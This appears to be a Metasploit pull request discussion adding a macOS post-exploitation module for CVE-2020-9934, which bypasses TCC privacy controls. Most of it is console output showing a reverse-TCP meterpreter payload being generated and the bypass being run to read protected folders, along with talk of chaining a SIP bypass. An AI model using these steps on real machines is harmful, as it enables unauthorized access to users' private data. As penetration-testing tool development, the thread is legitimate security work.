Add module for CVE-2020-9934

[timwr]

Add a quick module for CVE-2020-9934, ping @mattshockl

Verification

• Get a session on OSX 10.15.5 (or lower)
• Run the module:

use post/osx/escalate/tccbypass 
set SESSION 1
run

• Verify you can now access the Documents folder

msf5 post(osx/escalate/tccbypass) > sessions

Active sessions
===============

  Id  Name  Type                 Information                                                                       Connection
  --  ----  ----                 -----------                                                                       ----------
  1         meterpreter x64/osx  user @ Users-MacBook-Pro.local (uid=501, gid=20, euid=501, egid=20) @ Users-M...  192.168.56.1:4444 -> 192.168.56.3:49166 (192.168.56.3)

msf5 post(osx/escalate/tccbypass) > sessions -C "ls Documents"
[*] Running 'ls Documents' on meterpreter session 1 (192.168.56.3)
[-] stdapi_fs_ls: Operation failed: 1
msf5 post(osx/escalate/tccbypass) > run

[*] Creating TCC directory /tmp/.EhprHBDj/Library/Application Support/com.apple.TCC
[+] fake TCC DB found: /tmp/.EhprHBDj/Library/Application Support/com.apple.TCC/TCC.db
[+] TCC.db was successfully updated!
[*] To cleanup, run:
launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd
rm -rf /tmp/.EhprHBDj

[*] Post module execution completed
msf5 post(osx/escalate/tccbypass) > sessions -C "ls Documents"
[*] Running 'ls Documents' on meterpreter session 1 (192.168.56.3)
Listing: Documents
==================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  0     fil   2020-08-03 23:29:00 +0800  .localized
100644/rw-r--r--  0     fil   2020-08-05 13:14:16 +0800  lol

[label-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[bwatters-r7]

Forgive my MacOS ignorance, but I'm guessing when you say earlier than 10.15.5, you mean 10.15.0 - 10.15.14? I tried this on 10.14 and 10.13, but neither needed the module to access Documents?
I've been unable to coax/find a Catalina pre-10.15.6, so I'm pulling myself off this.

[bwatters-r7]

msf5 payload(osx/x64/meterpreter/reverse_tcp) > 
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (804084 bytes) to 192.168.132.178
[*] Meterpreter session 2 opened (192.168.135.197:4567 -> 192.168.132.178:49153) at 2020-08-14 15:27:47 -0500

msf5 payload(osx/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : msfusers-Mac.local
OS           : macOS Catalina (macOS 10.15.4)
Architecture : x86
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx
meterpreter > getuid
Server username: msfuser @ msfusers-Mac.local (uid=501, gid=20, euid=501, egid=20)
meterpreter > ls Documents
[-] stdapi_fs_ls: Operation failed: 1
meterpreter > background
[*] Backgrounding session 2...
msf5 post(osx/escalate/tccbypass) > show options

Module options (post/osx/escalate/tccbypass):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf5 post(osx/escalate/tccbypass) > set session 2
session => 2
msf5 post(osx/escalate/tccbypass) > run

[*] Creating TCC directory /tmp/.FlOIUSGt/Library/Application Support/com.apple.TCC
[+] fake TCC DB found: /tmp/.FlOIUSGt/Library/Application Support/com.apple.TCC/TCC.db
[+] TCC.db was successfully updated!
[*] To cleanup, run:
launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd
rm -rf '/tmp/.FlOIUSGt'

[*] Post module execution completed
msf5 post(osx/escalate/tccbypass) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > ls Documents
Listing: Documents
==================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  0     fil   2020-08-14 13:51:29 -0500  .localized

meterpreter > 

[bwatters-r7]

@timwr, thoughts on @bcoles changes?

[mattshockl]

Hey, just read over some of the code and it looks good! Here's just a few quick suggestions:

• TCC is active even if the user is root (and the normal TCC.db is SIP-protected, so you can't modify directly even as root), so I would suggest removing that fail-case
• There's a race condition I was hitting pretty often in testing my PoC where the service launches but doesn't create the database immediately so the database check might fail sometimes even if the target is actually vulnerable. However, since you're creating the fake TCC tmp directory anyway, I would suggest creating the database (just run sqlite3 on CREATE_DB in https://github.com/mattshockl/CVE-2020-9934/blob/master/BypassTCC.swift) BEFORE restarting the service. Therefore when TCCd restarts, is automatically sees the database you created and doesn't attempt to try and create a new one

And while TCC has been a part of macOS since Mountain Lion, it only started actively restricting file access in Catalina so versions pre-Catalina aren't vulnerable per se.

[timwr]

Apologies for the delay on this! I was prioritizing #13992 because I thought it would supplant this pr, but I suspect it is still useful.

What was confusing for me was that even after adding 'kTCCServiceCamera', 'kTCCServiceMicrophone', 'kTCCServiceAll', 'kTCCServiceScreenCapture', etc permissions I still was unable to get, for example, screenshare to work without manually granting it permission.

[mattshockl]

So I looked into this recently, and while I haven't reversed all of tccd yet, there is actually a tccd instance (and corresponding TCC.db) per logged in user and also one system-wide. I don't know exactly where the delineation occurs, but it looks like some kTCCService entitlements are stored in the system-wide database at /Library/Application Support/com.apple.TCC/TCC.db and these include camera/microphone/screen capture, which unfortunately subverts this bug because we don't have access to change the environment variables in launchd for the system-wide daemon running as root.

[timwr]

Thanks @mattshockl that makes a lot more sense now. Presumably if we disabled SIP, e.g with exploit 6) from https://github.com/sslab-gatech/pwn2own2020, we could write into that db and grant ourselves the permission.

[mattshockl]

Yeah with SIP disabled (and logged in as root) you should be able to write directly to the system-wide TCC.db and the currently logged-in user's TCC.db to get all of the entitlements

[timwr]

@bwatters-r7 fyi I think 10.15 -> 10.15.5 inclusive are vulnerable but I've only tested 10.15.3 and 10.15.4.
I think only 10.15.6 has the patch: https://support.apple.com/en-hk/HT211289

[bwatters-r7]

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use payload/osx/x64/meterpreter/reverse_tcp
msf6 payload(osx/x64/meterpreter/reverse_tcp) > set lhost 192.168.135.197
lhost => 192.168.135.197
msf6 payload(osx/x64/meterpreter/reverse_tcp) > set lport 4567
lport => 4567
msf6 payload(osx/x64/meterpreter/reverse_tcp) > generate -f macho -o revtcpx64.mac
[*] Writing 17204 bytes to revtcpx64.mac...
msf6 payload(osx/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.135.197:4567 
msf6 payload(osx/x64/meterpreter/reverse_tcp) > [*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (799916 bytes) to 192.168.132.178
[*] Meterpreter session 1 opened (192.168.135.197:4567 -> 192.168.132.178:49156) at 2020-09-10 11:44:05 -0500

msf6 payload(osx/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : msfusers-Mac.local
OS           : macOS Catalina (macOS 10.15.4)
Architecture : x86
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx
meterpreter > getuid
Server username: msfuser @ msfusers-Mac.local (uid=501, gid=20, euid=501, egid=20)
meterpreter > ls Documents
[-] 1009: Operation failed: 1
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(osx/x64/meterpreter/reverse_tcp) > use post/osx/escalate/tccbypass 
msf6 post(osx/escalate/tccbypass) > show options

Module options (post/osx/escalate/tccbypass):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf6 post(osx/escalate/tccbypass) > set session 1
session => 1
msf6 post(osx/escalate/tccbypass) > set verbose true
verbose => true
msf6 post(osx/escalate/tccbypass) > run

[*] Creating TCC directory /tmp/.SZulaEVB/Library/Application Support/com.apple.TCC
[+] fake TCC DB found: /tmp/.SZulaEVB/Library/Application Support/com.apple.TCC/TCC.db
[+] TCC.db was successfully updated!
[*] To cleanup, run:
launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd
rm -rf '/tmp/.SZulaEVB'

[*] Post module execution completed
msf6 post(osx/escalate/tccbypass) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: msfuser @ msfusers-Mac.local (uid=501, gid=20, euid=501, egid=20)
meterpreter > ls Documents 
Listing: Documents
==================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  0     fil   2020-08-14 13:51:29 -0500  .localized

meterpreter > 

[bwatters-r7]

Release Notes

New module post/osx/escalate/tccbypass leverages CVE-2020-9934 to allow a session to bypass the macOS Transparency, Consent, and Control (TCC) Framework for unauthorized access to sensitive user data.